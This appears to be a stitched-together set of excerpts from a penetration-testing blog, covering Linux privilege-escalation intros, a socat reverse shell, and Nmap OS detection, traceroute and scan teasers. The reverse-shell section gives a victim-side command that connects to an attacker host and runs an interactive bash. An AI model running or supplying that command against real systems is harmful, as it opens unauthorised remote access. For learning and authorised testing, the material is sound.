Today, I'm taking a look at using sudo to escalate a local user's privileges to root (administrator) privileges.
One of the paths to privilege escalation on Linux is a kernel exploit. This post will showcase how a kernel exploit works.
Tool used to establish a more stable shell compared to netcat.
Features:
- Use of the arrow keys
- Allows for interactive commands such as sudo
- Use of CTRL + S, CTRL + C

Reverse Shell for Linux
Attacker:
socat TCP-L:<port> FILE:$(tty),raw,echo=0
Victim:
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Additional step: Open a new command prompt and type stty -a, then record the values of rows and columns.
Next, in your reverse/bind shell, type:
stty rows <number>
OS Detection
To initiate OS detection with Nmap, you can use the -O option. For example:
sudo nmap -O 192.168.233.139
Traceroute
If you want Nmap to find the routers between you and the target, you would add --traceroute. For example:
sudo nmap -sS --traceroute 192.168.233.139
In this post, I will establish rules for figuring out which ports are closed or open, no matter what type of scan you use. Additionally, we will cover scans to use against firewalls.
Using Nmap, we will feature service detection to investigate a service for any vulnerabilities. Then, we will look at it from a Wireshark perspective to see what it looks like from a network point of view.